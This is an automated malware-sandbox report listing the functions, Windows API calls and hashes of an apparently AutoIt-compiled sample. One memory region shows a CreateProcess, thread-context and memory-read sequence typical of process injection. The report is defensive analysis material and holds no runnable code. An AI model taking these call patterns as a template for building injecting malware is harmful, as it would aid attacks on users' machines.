                                                        • Part of subcall function 00E33AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E33A97,?,?,00E32E7F,?,?,?,00000000), ref: 00E33AC2
                                                        • Part of subcall function 00E32DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E32DC4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Name$Path$FileFullLongOpen
                                                      • String ID: X$`e
                                                      • API String ID: 779396738-4036142377
                                                      • Opcode ID: ac438954e9fe67170de76f96060fc081b5e360ecb08e03b9fbc65e2809cffaad
                                                      • Instruction ID: 007e15086def16c1667be0199ef8570d80c98d4fe7a9e23bb19b41cc17a781d6
                                                      • Opcode Fuzzy Hash: ac438954e9fe67170de76f96060fc081b5e360ecb08e03b9fbc65e2809cffaad
                                                      • Instruction Fuzzy Hash: 3521A571A0025C9FDB01EF94C84ABEEBBF8AF49304F009059E649B7241DBB45A49CFA1
                                                      Function 00E4FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E50668
                                                        • Part of subcall function 00E532A4: RaiseException.KERNEL32(?,?,?,00E5068A,?,00F01444,?,?,?,?,?,?,00E5068A,00E31129,00EF8738,00E31129), ref: 00E53304
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00E50685
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                      • String ID: Unknown exception
                                                      • API String ID: 3476068407-410509341
                                                      • Opcode ID: 0017fb9efa5d64f1a946c15cf05a39a2a0e721516655645b26f6dcf143aac419
                                                      • Instruction ID: 384043b9b05d9277f44fdd4d252c128d89441c94e80afe573df04d62da25c612
                                                      • Opcode Fuzzy Hash: 0017fb9efa5d64f1a946c15cf05a39a2a0e721516655645b26f6dcf143aac419
                                                      • Instruction Fuzzy Hash: D3F0FF3490020D638B00BAB4E846EAE7BAC5E00345B606931FD14F69E2EFB1DA6DC580
                                                      Function 00EB7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00EB82F5
                                                      • TerminateProcess.KERNEL32(00000000), ref: 00EB82FC
                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00EB84DD
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                      • String ID:
                                                      • API String ID: 146820519-0
                                                      • Opcode ID: af9f4f3589183d74690c8f4d1525dd557ed2187a4f67b965491043b67b991ef5
                                                      • Instruction ID: 73e343e199789627a27a9b49a697ff48d44e0c3513f02beb2376a8e46764edcc
                                                      • Opcode Fuzzy Hash: af9f4f3589183d74690c8f4d1525dd557ed2187a4f67b965491043b67b991ef5
                                                      • Instruction Fuzzy Hash: FA128C71A083019FC714DF28C584B6ABBE5BF88318F14995DE899AB352CB31ED45CF92
                                                      Function 00E310F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E31BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E31BF4
                                                        • Part of subcall function 00E31BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E31BFC
                                                        • Part of subcall function 00E31BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E31C07
                                                        • Part of subcall function 00E31BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E31C12
                                                        • Part of subcall function 00E31BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E31C1A
                                                        • Part of subcall function 00E31BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E31C22
                                                        • Part of subcall function 00E31B4A: RegisterWindowMessageW.USER32(00000004,?,00E312C4), ref: 00E31BA2
                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E3136A
                                                      • OleInitialize.OLE32 ref: 00E31388
                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 00E724AB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                      • String ID:
                                                      • API String ID: 1986988660-0
                                                      • Opcode ID: 13e04d90d11cbbf614d2090259f29007b13d682a1259b4862e25ec432500765f
                                                      • Instruction ID: b9522a073e9df935f42b489f43975a7f88ff79bf152d2e53e701f93a5e5cabcc
                                                      • Opcode Fuzzy Hash: 13e04d90d11cbbf614d2090259f29007b13d682a1259b4862e25ec432500765f
                                                      • Instruction Fuzzy Hash: 7571CDB89013088FC794DF79AD49A657AE0FBC9344758922EE44AEB3B2EB304545FF41
                                                      Function 00E686AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • CloseHandle.KERNELBASE(00000000,00000000,?,?,00E685CC,?,00EF8CC8,0000000C), ref: 00E68704
                                                      • GetLastError.KERNEL32(?,00E685CC,?,00EF8CC8,0000000C), ref: 00E6870E
                                                      • __dosmaperr.LIBCMT ref: 00E68739
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                      • String ID:
                                                      • API String ID: 2583163307-0
                                                      • Opcode ID: f009efbf99cffe208b4f7ebc18eed31fcad030f26b328c3b5ba19eba0e72b6be
                                                      • Instruction ID: e29b01c60ed46ea80a8ffed698468a6251cc46e09d20e5bd1d90f4a5b653264f
                                                      • Opcode Fuzzy Hash: f009efbf99cffe208b4f7ebc18eed31fcad030f26b328c3b5ba19eba0e72b6be
                                                      • Instruction Fuzzy Hash: BC016B337C42601AC2306234FA45B7E27894B81BFCF383329F918FB2D2DEA18C819150
                                                      Function 00E41310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 00E417F6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID: CALL
                                                      • API String ID: 1385522511-4196123274
                                                      • Opcode ID: 9075d804a4cb1e8b1ee13352f255a75311e50c7fcb8abb126d3cfb89c868adb1
                                                      • Instruction ID: f3fa0457b3f69b485de779c835fe5d8c4400bb38e743587597e5ca6168b0bbab
                                                      • Opcode Fuzzy Hash: 9075d804a4cb1e8b1ee13352f255a75311e50c7fcb8abb126d3cfb89c868adb1
                                                      • Instruction Fuzzy Hash: CC22BE706083419FCB14DF14D484B6ABBF1BF89314F18999DF49AAB361D731E885CB52
                                                      Function 00E33837 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E33908
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_
                                                      • String ID:
                                                      • API String ID: 1144537725-0
                                                      • Opcode ID: 1af6de9f62511695ee79c4a79c71b2759b30e5139cbe146c6b87d14c9f139aba
                                                      • Instruction ID: da4810f8779eeedfa0c8707a881079e9247ceb1e0ae86782cbff775102afbce1
                                                      • Opcode Fuzzy Hash: 1af6de9f62511695ee79c4a79c71b2759b30e5139cbe146c6b87d14c9f139aba
                                                      • Instruction Fuzzy Hash: C0319370504301DFD720DF34D889B97BBE4FB49709F00192EF599A3290E771AA44DB52
                                                      Function 00E35745 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00E3949C,?,00008000), ref: 00E35773
                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00E3949C,?,00008000), ref: 00E74052
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: e627a3a0d605b2c538465b0c2dedd972ab4e9d854d826191a6abfd9d06bc8034
                                                      • Instruction ID: 004a5f499978aecdd2ec044fd557808b33b827f0d7609aa7b2d3c2abb0ede95a
                                                      • Opcode Fuzzy Hash: e627a3a0d605b2c538465b0c2dedd972ab4e9d854d826191a6abfd9d06bc8034
                                                      • Instruction Fuzzy Hash: 98018031145225BAE3310A2ACC0EF977F98EF027B4F148215BAAC6A1E0C7B55855CB90
                                                      Function 00E3B710 Relevance: 2.1, APIs: 1, Instructions: 587COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __Init_thread_footer.LIBCMT ref: 00E3BB4E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Init_thread_footer
                                                      • String ID:
                                                      • API String ID: 1385522511-0
                                                      • Opcode ID: e48f2493dcf273eb2ff1c121a581469bffc07dc1f5c049a86ad1e62c105f0dd8
                                                      • Instruction ID: 4c242e254955f00376e7cef407c5fbdfd1c659261c2420b842555f9d94fe10dd
                                                      • Opcode Fuzzy Hash: e48f2493dcf273eb2ff1c121a581469bffc07dc1f5c049a86ad1e62c105f0dd8
                                                      • Instruction Fuzzy Hash: 1B32BE30A002099FDB24DF54C898BBABBF9FF44318F14A059EA0ABB261C775AD45DB51
                                                      Function 01487FBD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateProcessW.KERNELBASE(?,00000000), ref: 0148877B
                                                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01488811
                                                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01488833
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2159335392.0000000001486000.00000040.00000020.00020000.00000000.sdmp, Offset: 01486000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1486000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                      • String ID:
                                                      • API String ID: 2438371351-0
                                                      • Opcode ID: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                      • Instruction ID: 212140ec975a0c87e3bd64e245bbc5a5e2dfc94795dcf3db7fe16bd6e6e0adfa
                                                      • Opcode Fuzzy Hash: 6ff7500a3617197a005732162d507dd4d37460c8dcbf147a4ae2be43d63b6423
                                                      • Instruction Fuzzy Hash: 2812CD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                      Function 00EB709C Relevance: 1.8, APIs: 1, Instructions: 326COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: LoadString
                                                      • String ID:
                                                      • API String ID: 2948472770-0
                                                      • Opcode ID: 6bafee953130cacc99fbbe6da23c6a2625c3cb02743ed5565b07ed23bd86d7a8
                                                      • Instruction ID: 3926264afd0cb7743e1c30dddc9c2e94c5a29af4e990c09795c08a20799ae7c4
                                                      • Opcode Fuzzy Hash: 6bafee953130cacc99fbbe6da23c6a2625c3cb02743ed5565b07ed23bd86d7a8
                                                      • Instruction Fuzzy Hash: 7BD15B75A05209EFCB14EF98C8819EEBBF5FF88314F145059E955BB291EB30AD81CB90
                                                      Function 00E4FC70 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: b51f8c76c9442941210260bde10b1a80fb2e9b3674fc306d7c87be2d77e9653f
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: DB310474A00109DBCB18CF59E4C0A69FBA1FF49704B24A6A5E80AEF656D731EDC1CBC0
                                                      Function 00E34ECB Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E34E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E34EDD,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34E9C
                                                        • Part of subcall function 00E34E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E34EAE
                                                        • Part of subcall function 00E34E90: FreeLibrary.KERNEL32(00000000,?,?,00E34EDD,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34EC0
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34EFD
                                                        • Part of subcall function 00E34E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E73CDE,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34E62
                                                        • Part of subcall function 00E34E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E34E74
                                                        • Part of subcall function 00E34E59: FreeLibrary.KERNEL32(00000000,?,?,00E73CDE,?,00F01418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00E34E87
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressFreeProc
                                                      • String ID:
                                                      • API String ID: 2632591731-0
                                                      • Opcode ID: def55a2ee248b78819cc5f0f8380ae92547fee7c08396a4217937dad195b1204
                                                      • Instruction ID: a712a76a91b4259e5e6511e7cd5e167538e04925b5c7523bcbd7d10beb4aad37
                                                      • Opcode Fuzzy Hash: def55a2ee248b78819cc5f0f8380ae92547fee7c08396a4217937dad195b1204
                                                      • Instruction Fuzzy Hash: C5112372700305AACB14AB74DC0AFAD7BE5AF40710F24A42DF542BA1C1EE71AA05DB50
                                                      Function 00E68402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: __wsopen_s
                                                      • String ID:
                                                      • API String ID: 3347428461-0
                                                      • Opcode ID: 7b8806e17f9cfbc46a75aca3990342bf82d64a976402e9f0bc60d702e95fe9f4
                                                      • Instruction ID: dffbdfb222b10cf233dfbf5baa81535d9f9506e29ec12893dec5f3da36f4fd0c
                                                      • Opcode Fuzzy Hash: 7b8806e17f9cfbc46a75aca3990342bf82d64a976402e9f0bc60d702e95fe9f4
                                                      • Instruction Fuzzy Hash: EF11187590410AAFCB15DF58E941A9E7BF5EF48314F104199F818AB312DA31DA11CBA5
                                                      Function 00E65000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E64C7D: RtlAllocateHeap.NTDLL(00000008,00E31129,00000000,?,00E62E29,00000001,00000364,?,?,?,00E5F2DE,00E63863,00F01444,?,00E4FDF5,?), ref: 00E64CBE
                                                      • _free.LIBCMT ref: 00E6506C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: AllocateHeap_free
                                                      • String ID:
                                                      • API String ID: 614378929-0
                                                      • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                      • Instruction ID: 526ad4d52110a9cc6820b080a7b8ec1547eb433042fd129ef99394e1a5cea33d
                                                      • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                      • Instruction Fuzzy Hash: 710126732447056BE3218F65E881A9AFBE8FB893B0F25051DE194A32C0EA30A905C7B4
                                                      Function 00E5E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                      • Instruction ID: 72e9a84d15763991118e91917e8f85604ba65785ddba7df9149ae6342ea518dc
                                                      • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                      • Instruction Fuzzy Hash: 51F04932500A109AC7353A259C05B5A33C98F923F7F101F15FC21B22D1CBB0D90986A5
                                                      Function 00E39CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID:
